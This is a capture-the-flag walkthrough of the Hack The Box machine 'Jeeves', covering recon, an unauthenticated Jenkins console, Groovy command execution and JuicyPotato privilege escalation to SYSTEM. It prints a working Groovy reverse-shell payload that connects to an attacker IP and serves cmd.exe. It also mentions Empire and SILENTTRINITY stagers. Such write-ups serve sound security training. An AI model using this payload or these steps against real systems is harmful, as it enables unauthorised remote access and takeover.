10.10.10.63 - Jeeves - Jenkins WebServer, SeImpersonatePrivilege

Summary: vulnerable software : Unauthenticated access to Jenkins WebServer system vulnerable : 10.10.10.63 vulnerability explanation : privilege escalation: seImpersonatePrivilege given to a user severity : critical

Launch a scanner to discover open ports. In this case -O (OS detection) -A (aggressive) --script vuln was also used:

Even though Nmap did not discover specific OS, from the webserver banner we learn that Microsoft-IIS 10.0 is in place suggesting: Windows 10 or Windows Server 2016.

IIS 10.0 is the latest version of Internet Information Services (IIS) which shipped with Windows 10 and Windows Server 2016. - Microsoft.com

Port 50000 provided access to a Jetty WebServer.

Jetty 9.4.z-SNAPSHOT running on port 5000

Since we did not find enough to proceed with further exploitation, directories bruteforcing came into play:

Dirbuster provided a rich overview of the content sitting on the Jetty Server.

From here it was easy to follow the trail that led us to a Jenkins server. Installation and management console did not require authentication which is a first sign of a vulnerability.

Jenkins is an open source automation server written in Java. Jenkins helps to automate the non-human part of the software development process, with continuous integration and facilitating technical aspects of continuous delivery. It is a server-based system that runs in servlet containers such as Apache Tomcat. Wikipedia

Jenkins Version

Year of the release:

Useful information when searching for possible exploits.

Jenkins server provides systeminfo function allowing to enumerate OS version, architecture and local user name:

On top of that we discover functionality to access CLI features. After downloading jenkins-cli.jar we can query the system for server privileges information:

java -jar jenkins-cli.jar -s http://10.10.10.63:50000/askjeeves/ who-am-i

Perhaps this feature can provide us for an opportunity to either run a code directly on the host or upload a feature(webshell) that can do that for us. Time to search for available exploits:

Jenkins CLI can be our way in!

All available Metasploit modules for Jenkins were written before 2017 which are unlikely to work in this case, except for Jenkins Enumeration:

Seems like a dead end. However, similar functionality of interacting with Jenkins server is provided through execution of Groovy script located on /askjeeves/script. Thanks to this stackoverflow answer we see that we can make the script execute arbitrary commands on the target host:

Houston we have a lift off.

Searching through github I have found another groovy script allowing for a reverse connection from a Windows host:

String host="10.10.14.12";
int port=443;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Result and a user flag:

SILENTTRINITY stager working as expected:

Great tool for executing in memory .NET assemblies

Host enumeration; no kernel vulnerabilities on this one:

Dead end is never an end

Different path to privilege escalation:

When you see SeImpersonatePrivledge think Juicy Potatoes

In this case we have uploaded juicypotato.exe and we executed our empire launcher with below command as a System User:

Successful root shell as a SYSTEM user

Root flag was hidden elsewhere:

Look deeper... hmmm...

I have looked deeper, we RDPed to the box to pillage the files. All that was needed was a dir /R command to discover a hidden file: